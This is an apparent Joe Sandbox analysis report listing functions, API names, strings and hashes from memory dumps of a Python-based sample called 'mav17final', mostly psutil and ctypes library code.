                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$ArgvCloseCommandHandleLineOpenProcess
                                                  • String ID: (originated from %s)$CommandLineToArgvW$i|O$psutil_pid_is_running -> 0
                                                  • API String ID: 2690751061-2335919432
                                                  • Opcode ID: deac87614d14d2cd7fcede053ea73ff55bdac4ec2ebd44c97669a55f081cdf00
                                                  • Instruction ID: c5494dee04d0dfcc8109aa490335e024c21a24b4be26d969f6af82713798fb29
                                                  • Opcode Fuzzy Hash: deac87614d14d2cd7fcede053ea73ff55bdac4ec2ebd44c97669a55f081cdf00
                                                  • Instruction Fuzzy Hash: 12513065A0DAC281EE609F29E8443BA67A4FFA4BE4F440135DB9E436A5DF3CE4468710
                                                  Function 00007FF8B9073560 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 64nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleInformationLastOpenQuery
                                                  • String ID: NtQueryInformationProcess$OpenProcess$automatically set for PID 0
                                                  • API String ID: 241081717-1336995763
                                                  • Opcode ID: fff3764ab0624a0679a94573e97877e1ec39213333331769b47d7f519c66ef76
                                                  • Instruction ID: 641d0e2444501ac5e0ce0a16dd1c09a90d9d7e4490dfc546fb8b23eee9d0b2b3
                                                  • Opcode Fuzzy Hash: fff3764ab0624a0679a94573e97877e1ec39213333331769b47d7f519c66ef76
                                                  • Instruction Fuzzy Hash: 3C216061B0C6C382FF509F29F8802B96BA1BFA47E4F584035DB0D876A5DE6CE4468740
                                                  Function 00007FF8B9073660 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleInformationLastOpen
                                                  • String ID: NtSetInformationProcess$OpenProcess$automatically set for PID 0
                                                  • API String ID: 1640454886-2953277767
                                                  • Opcode ID: d920bf36b67fe67c9ea594868500f7548756d307c4f36ca9bf250ace23d20d22
                                                  • Instruction ID: 4f2139c5f59f0b99cafc210c623abbf2e7ae7fb5bc70f67ecb7417e0026e0b29
                                                  • Opcode Fuzzy Hash: d920bf36b67fe67c9ea594868500f7548756d307c4f36ca9bf250ace23d20d22
                                                  • Instruction Fuzzy Hash: 3C217121B1C68782FE549F2DF8805B92BA1AFA8BE0F448035DB1D477A5DE2CE4878700
                                                  Function 00007FF8B9073AE0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 253COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastswprintf_s
                                                  • String ID: %u.%u.%u.%u$OOd$WTSEnumerateSessionsW$WTSQuerySessionInformationW
                                                  • API String ID: 1644374431-281470548
                                                  • Opcode ID: 351cb9ce14cdabf345c66a283de42749b0387cef55aa96c4d2e12f7dfe231774
                                                  • Instruction ID: ae3a2f958a9d08d5f69ebbe5b1613a00f206bb29e5baed8852df6757f397f698
                                                  • Opcode Fuzzy Hash: 351cb9ce14cdabf345c66a283de42749b0387cef55aa96c4d2e12f7dfe231774
                                                  • Instruction Fuzzy Hash: 9FC12832B09A82C6FF658F69A8542BD3BA1AF64BE4F044135CF5E52A94DF3CE446C300
                                                  Function 00007FF8B907A928 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 4d451b1ebd3bd04a7980592fc1aa2c80c17f49c06b6c165df2ba8b78148fda11
                                                  • Instruction ID: f241a1fb76d664808ac077d5358bb4d4e89cda9b8420c40ca779451049ba9dd2
                                                  • Opcode Fuzzy Hash: 4d451b1ebd3bd04a7980592fc1aa2c80c17f49c06b6c165df2ba8b78148fda11
                                                  • Instruction Fuzzy Hash: B9316C72609AC186EF608F64E8403EE3760FB94794F44403ADB4E47A94EF3CC64AC710
                                                  Function 00007FF8B9078F50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseHandleStart
                                                  • String ID: StartService
                                                  • API String ID: 402030760-99420325
                                                  • Opcode ID: 2ffd32a0515497b06187faa6b065d56fefb2bb7c14a36f5e79439c80651379cc
                                                  • Instruction ID: 3adf2a51a8424c42382fdaf1e80532bbb70b2c31f50425a25245338c81b68afb
                                                  • Opcode Fuzzy Hash: 2ffd32a0515497b06187faa6b065d56fefb2bb7c14a36f5e79439c80651379cc
                                                  • Instruction Fuzzy Hash: 86017120B0968381EE15AF2AEC942B967E1BFA9BD4F880031CB4D43754EE3CE5478700
                                                  Function 00007FF8B90756B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DiskFreeSpace
                                                  • String ID: (LL)
                                                  • API String ID: 1705453755-591180812
                                                  • Opcode ID: 25a55e9020650d3683c57d1660a1f10089e65ec50ba526113029ab9d531df5ab
                                                  • Instruction ID: b4c34cfc7f40ff58454d7b8a7b2540f7ed284569cfd0be3dbb1357d36da9c692
                                                  • Opcode Fuzzy Hash: 25a55e9020650d3683c57d1660a1f10089e65ec50ba526113029ab9d531df5ab
                                                  • Instruction Fuzzy Hash: 59011665A08AC6C2DF109F65F8441AAAB70FF947E4F841036DB4D43A28DF7CD54ACB00
                                                  Function 00007FF8B9F65304 Relevance: 124.6, APIs: 52, Strings: 19, Instructions: 370COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6532F
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65366
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6538B
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653AA
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653CC
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653EB
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6540D
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6542C
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65451
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65470
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65495
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F654B4
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F654D9
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F654F8
                                                  • PyUnicode_FromString.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6551F
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6553E
                                                  • PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65565
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65584
                                                  • PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F655AB
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F655CA
                                                  • PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F655F1
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65610
                                                  • PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65637
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65656
                                                  • PyLong_FromVoidPtr.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6567D
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6569C
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F656BE
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F656DD
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F656FF
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6571E
                                                  • PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65743
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6575E
                                                  • PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65795
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6921F
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6922E
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6923D
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6924C
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6925B
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6926A
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F69279
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F69288
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F69297
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F692A6
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F692B5
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F692C4
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F692D3
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F692E2
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F692F1
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F69300
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F69318
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F69327
                                                  • _Py_Dealloc.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F69336
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Module_Object$From$Long_$Long$Void$StringUnicode_
                                                  • String ID: 1.1.0$ArgumentError$COMError$CTYPES_MAX_ARGCOUNT$FUNCFLAG_CDECL$FUNCFLAG_HRESULT$FUNCFLAG_PYTHONAPI$FUNCFLAG_STDCALL$FUNCFLAG_USE_ERRNO$FUNCFLAG_USE_LASTERROR$RTLD_GLOBAL$RTLD_LOCAL$__version__$_cast_addr$_memmove_addr$_memset_addr$_pointer_type_cache$_string_at_addr$_wstring_at_addr
                                                  • API String ID: 2895207140-772522829
                                                  • Opcode ID: b7dbbcc8b36d8762ecc7955ef4353bb7629bcf7eedf864b22fa349bc15453bc1
                                                  • Instruction ID: 4ec3a03f503e6f4c52e5320dc757a82d597c9a1763a5179b8175a5b5ef12f506
                                                  • Opcode Fuzzy Hash: b7dbbcc8b36d8762ecc7955ef4353bb7629bcf7eedf864b22fa349bc15453bc1
                                                  • Instruction Fuzzy Hash: 9BE1CA65A0AFC385FE498F69D9642782764AF4AFF6F086135CF0E56795EE2CE044C201
                                                  Function 00007FF8BA248EE4 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                  • API String ID: 2943138195-1482988683
                                                  • Opcode ID: 36e6e2d055789cd29251c4bf9697f6c8a4377c58ea8e1572b96a4f003d2d3a05
                                                  • Instruction ID: d9356da33a55440f9048a8c23a8d01f1c882bed38599632adb2e5f5a46a6887a
                                                  • Opcode Fuzzy Hash: 36e6e2d055789cd29251c4bf9697f6c8a4377c58ea8e1572b96a4f003d2d3a05
                                                  • Instruction Fuzzy Hash: CE024A72E1861388FB24CB6CD8951BC2BB0BB05BC4F5451BADF0D16AA8DF2DE544E350
                                                  Function 00007FF8B9F61B80 Relevance: 54.5, APIs: 17, Strings: 14, Instructions: 246COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Dealloc$Arg_FormatParseSizeStringTuple_$Eval_Thread$AddressAttrAuditLong_Object_OccurredProcRestoreSaveSequence_Sys_TupleVoid
                                                  • String ID: O&O;illegal func_spec argument$O|O$_handle$abstract class$could not convert the _handle attribute to a pointer$ctypes.dlsym$function '%s' not found$function ordinal %d not found$i|OO$paramflag value %d not supported$paramflags must be a sequence of (int [,string [,value]]) tuples$paramflags must be a tuple or None$paramflags must have the same length as argtypes$the _handle attribute of the second argument must be an integer
                                                  • API String ID: 1081342661-1557499450
                                                  • Opcode ID: 81bf86f915efca78798dbd81cfc19dde70ba7face78de59bde1888ce70c5e139
                                                  • Instruction ID: 36d09bc0d685742ffa6e45c4981265866e15ceb953f4f7df7133d95cbb6a0ad4
                                                  • Opcode Fuzzy Hash: 81bf86f915efca78798dbd81cfc19dde70ba7face78de59bde1888ce70c5e139
                                                  • Instruction Fuzzy Hash: CFC11922B09B8285EB548FADD8541B927B4BF46BEAF586036DB0E577A4DF3CE445C300
                                                  Function 00007FF8B9F6C9D0 Relevance: 54.5, APIs: 23, Strings: 8, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Err_ErrorLast_errno$State_UnraisableWrite$CheckContainsDict_EnsureFunctionObject_ReleaseResultStringSubtypeType_VectorcallWarnmemcpy
                                                  • String ID: Parsing argument %zd$cannot build parameter$create argument %zd:$getting _needs_com_addref_$memory leak in callback function.$on calling ctypes callback function$on converting result of ctypes callback function$unexpected result of create argument %zd:
                                                  • API String ID: 1331253392-2697724128
                                                  • Opcode ID: 662eda2fa9ad5fa4c0407cff36c88571a43e939dd8943eeb715751b67e50d2ce
                                                  • Instruction ID: 11aba1ae14d1602639fee622c5b797bd818907b5c4a8aa504e1fb5e9e277e6b3
                                                  • Opcode Fuzzy Hash: 662eda2fa9ad5fa4c0407cff36c88571a43e939dd8943eeb715751b67e50d2ce
                                                  • Instruction Fuzzy Hash: 6CB14722A09BC286EB50DF29D8545B82BA0FF46BEAF499535DB5E477A4DF3CE444C300
                                                  Function 00007FF8B9076C60 Relevance: 49.1, APIs: 17, Strings: 11, Instructions: 124threadsynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf$Thread$CloseCreateErrorHandleLastObjectSingleTerminateWait
                                                  • String ID: (originated from %s)$CreateThread$GetExitCodeThread$GetExitCodeThread (failed) -> TerminateThread$TerminateThread$WaitForSingleObject$WaitForSingleObject -> WAIT_FAILED$WaitForSingleObject -> WAIT_FAILED -> TerminateThread$get handle name thread timed out after %i ms$psutil-debug [%s:%d]> $psutil/arch/windows/process_handles.c
                                                  • API String ID: 4284840722-1322275399
                                                  • Opcode ID: 9dd7a0f0f07ac5019de236ac24ecf5f1858d8291b80df825920e46def3d78e7e
                                                  • Instruction ID: 953d92833106573419d6e64965fbfa7ae0891b4612ca24f2c98c9e67582b03a1
                                                  • Opcode Fuzzy Hash: 9dd7a0f0f07ac5019de236ac24ecf5f1858d8291b80df825920e46def3d78e7e
                                                  • Instruction Fuzzy Hash: 2D511A24E0DAC792FE549F29E8553B92B61BFA47E1F405036DB0F462A1DE3CE84AC351
                                                  Function 00007FF8B9F641E0 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 214stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Object_$AttrDeallocString$Err_$Format$CallDict_LookupMakeMallocMem_OccurredSizeUnicode_Updatestrchr
